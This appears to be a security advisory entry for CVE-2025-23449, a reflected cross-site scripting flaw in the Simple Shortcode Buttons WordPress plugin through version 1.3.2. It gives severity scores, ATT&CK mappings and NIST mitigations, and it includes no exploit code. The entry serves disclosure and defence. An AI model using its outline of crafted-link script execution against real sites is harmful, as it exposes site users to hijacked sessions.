CVE-2025-23449
Published: 22 January 2025
Summary
CVE-2025-23449 is a high-severity Cross-site Scripting (CWE-79) vulnerability. Its CVSS base score is 7.1 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked at the 46.2th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Deeper analysis
CVE-2025-23449 is an Improper Neutralization of Input During Web Page Generation vulnerability, classified as Reflected Cross-site Scripting (XSS) under CWE-79, in the WordPress plugin Simple Shortcode Buttons by davidpuc. This issue affects all versions of the plugin from n/a through 1.3.2 inclusive.
The vulnerability carries a CVSS v3.1 base score of 7.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L), indicating network accessibility with low attack complexity, no required privileges, and user interaction needed for exploitation. Remote attackers can deliver a reflected XSS payload, such as via malicious links or inputs processed by the plugin, tricking authenticated users into executing scripts in their browsers. This enables limited impacts on confidentiality, integrity, and availability, with a changed scope that may affect other users or site resources through the victim's context.
Mitigation details are available in the Patchstack advisory at https://patchstack.com/database/Wordpress/Plugin/simple-shortcode-buttons/vulnerability/wordpress-simple-shortcode-buttons-plugin-1-3-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-3187
Vulnerability details
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in davidpuc Simple shortcode buttons simple-shortcode-buttons allows Reflected XSS.This issue affects Simple shortcode buttons: from n/a through <= 1.3.2.
- CWE(s)
Related Threats
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
The reflected XSS vulnerability in the public-facing WordPress plugin directly enables exploitation of public-facing applications (T1190) via crafted malicious links, resulting in arbitrary JavaScript execution in the victim's browser (T1059.007).
CVEs Like This One
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
Directly prevents reflected XSS by filtering user inputs prior to rendering in web pages generated by the vulnerable WordPress plugin.
Enforces validation of input structure and content to neutralize malicious XSS payloads before processing by the Simple Shortcode Buttons plugin.
Requires timely flaw remediation, including patching the vulnerable Simple Shortcode Buttons plugin versions up to 1.3.2.